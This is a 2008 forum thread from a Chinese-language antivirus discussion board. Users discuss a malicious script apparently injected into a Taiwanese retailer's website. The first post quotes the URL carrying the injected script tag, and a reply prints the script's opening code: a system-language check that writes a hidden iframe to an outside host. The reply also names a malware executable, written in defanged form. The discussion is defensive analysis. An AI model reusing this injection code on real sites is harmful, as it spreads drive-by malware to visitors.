您尚未
登入
注册
忘记密码
搜寻
赞助
赞助本站
数位公仔
纪念T恤
纪念马克杯
广告
刊登广告
广告价格
线上申请刊登
用雅币刊登
免费刊登
目前客户
简讯
简讯说明
购买金币
发送简讯
预约简讯
发送记录
好友通讯
罐头简讯
论命
数位论命馆
免费排盘工具
葫芦墩 优生造命
葫芦墩 八字命书
影音论命(葫芦墩)
影音占卜(葫芦墩)
购买金币
星座分析
孔明神数
周公解梦
星侨线上论命
娱乐
影 像 行 脚
数 位 造 型
数 位 画 廊
心 情 日 记
公 益 彩 券
送生日蛋糕
俄罗斯方块
四 川 省
猜 数 字
比 大 小
泡 泡 龙
许 愿 池
万 年 历
经 期 计 算
体 重 测 量
音 乐 点 播
卫 星 地 图
时间戳字幕
男女聊天室
求助
论坛守则
会员等级
会员权限
语法教学
常见问题
最新活动
打工赚雅币
最近
CS模组区
-最近浏览-
【反编CSS..
首页
新版首页(全页)
传统首页(全页)
新版首页(选单)
传统首页(选单)
MyChat 数位男女
命理风水
15
星侨五术软体
4
葫芦墩命理网
5
命理问答
9
四柱八字
1
紫微斗数
1
姓名学
手面相
易经占卜
1
风水研讨
1
择日&三式
1
西洋占星
无视论塔罗牌
10
修行&武术
1
中医研讨
五术哈啦
1
电脑资讯
13
硬体讨论
5
超频 & 开箱
3
数位生活
2
PDA 讨论
手机讨论区
软体推荐
2
软体讨论
6
Apple 讨论
1
Unix-like
网路&防毒
2
程式设计
网站架设
4
电脑教学资源
生活休闲
14
休闲哈啦
7
感情世界
2
上班一族
5
国考&法律
7
生活医学
4
运动体育
1
单车讨论
1
钓鱼讨论
6
旅游讨论
4
天文观星
3
摄影分享
8
图片分享
4
数位影视
2
笑话集锦
3
兴趣嗜好
13
文学散文
7
绘图艺术
1
布袋戏
3
动漫画讨论
3
美食天地
6
理财专区
心理测验
1
汽、机车
3
宠物园地
模型&手工艺
4
花卉园艺
魔术方块
独轮车专区
电玩游戏
13
游戏欢乐包
4
CS讨论
8
Steam
3
MineCraft
2
东方Project
英雄联盟LOL
1
单机游戏
2
WebGame
3
线上游戏1
6
线上游戏2
5
电视游乐器
1
掌上型游戏
2
模拟器游戏
1
工商服务
6
虚拟城市
7
好康分享
新品贩售
二手拍卖
1
租屋&找屋
工商建议区
1
站务专区
10
最新活动
活动成果
数位造型
心情日记
个人图库
新人报到练习
论坛问题建议
1
荣会及电子报讨论
-最近版区-
CS模组区
-最近浏览-
【反编CSS..
»
电脑资讯
硬体讨论
超频 & 开箱
数位生活
PDA 讨论
手机讨论区
软体推荐
软体讨论
Apple 讨论
Unix-like
网路&防毒
程式设计
网站架设
电脑教学资源
»
网路&防毒
网路通讯讨论
防毒防骇讨论
»
防毒防骇讨论
防毒历史问题
»
知名网站被植入恶意程式?
手机版
订阅
地图
繁体
您是第
4425
个阅读者
可列印版
加为IE收藏
收藏主题
上一主题
|
下一主题
lens690
级别:
初露锋芒
x1
x51
分享:
▼
x
0
[问题讨论] 知名网站被植入恶意程式?
最近在找东西,连到「莱尔富」网站,发现奇怪的超连结...
复制程式
http://www.hilife.com.tw/E1-promote/E1_VIP_9705.asp<script%20src=http://www.dota11.cn/m.js></script>
其中,h t t p://w w w.dota11.cn/m.js ,这个连结,一直觉得怪怪的,但是上Google搜寻,又没找到啥~所以来这问问,这到底是做啥的?
如果真是恶意程式的话,那一堆网站都有捏~.....
刚刚点~没跑出东西,说404错误,防毒程式也没有侦测到~
确保电脑安全,勿点选不明档案或网址
x
0
[楼 主]
From:台湾中华电信HINET |
Posted:
2008-05-25 12:53 |
kerash
级别:
路人甲
x0
x2
分享:
▲
▼
抓下来分析就知道啦,八成是 HTML - Exploit
应该不需要贴内容出来吧 ...?只贴重点
js 的开头
if (navigator.systemLanguage=='zh-cn')
{
document.writeln("<iframe src=http:\/\/gm.culhs.com\/***\/am6.htm width=100 height=0><\/iframe>");
}
确认电脑的语言,中文语系就用某个0高的内置框架,连到某个网址(其他语言就不解了)
http://gm.cu...com/
***/am6.htm
其他后面的等我确认完再说,另外请你确认一下你电脑的时间有没有被改变
另外若读取网站,他会下载一个执行档
hxxp://www.woai117.cn/bak.exe
这才是有问题的档案。
此文章被评分,最近评分记录
财富:20 (by upside) | 理由:
热心回覆
x
1
[1 楼]
From:未知地址 |
Posted:
2008-05-25 18:03 |
lens690
级别:
初露锋芒
x1
x51
分享:
▲
▼
时间 ...没有改变阿^^...
刚刚搜寻一下电脑,没有看到那个执行档~刚用扫毒扫过~也正常....
确保电脑安全,勿点选不明档案或网址
x
0
[2 楼]
From:台湾中华电信HINET |
Posted:
2008-05-25 18:50 |
kerash
级别:
路人甲
x0
x2
分享:
▲
▼
没有那就好了,那里面的内容很杂,跟我之前看过的都类似,不太想整理了
只是你是于莱尔富的哪个连结看到的?
x
0
[3 楼]
From:未知地址 |
Posted:
2008-05-26 01:00 |
lens690
级别:
初露锋芒
x1
x51
分享:
▲
▼
看来他门已经发现而且拿掉噜~~再过去已经没噜~~
确保电脑安全,勿点选不明档案或网址
x
0
[4 楼]
From:台湾中华电信HINET |
Posted:
2008-05-26 20:20 |
aa
级别:
站长
x1964
x5260
分享:
▲
大家请看
http://bbs.mychat.to/read.php?tid=710616
x
0
[5 楼]
From:台湾新世纪资通股份有限公司 |
Posted:
2008-05-29 11:20 |
MyChat 数位男女
»
防毒防骇讨论
Powered by
PHPWind
v1.3.6
Copyright © 2003-04
PHPWind
Processed in 0.013486 second(s),query:16 Gzip disabled
本站由
瀛睿律师事务所
担任常年法律顾问 |
免责声明
|
本网站已依台湾网站内容分级规定处理
|
连络我们
|
访客留言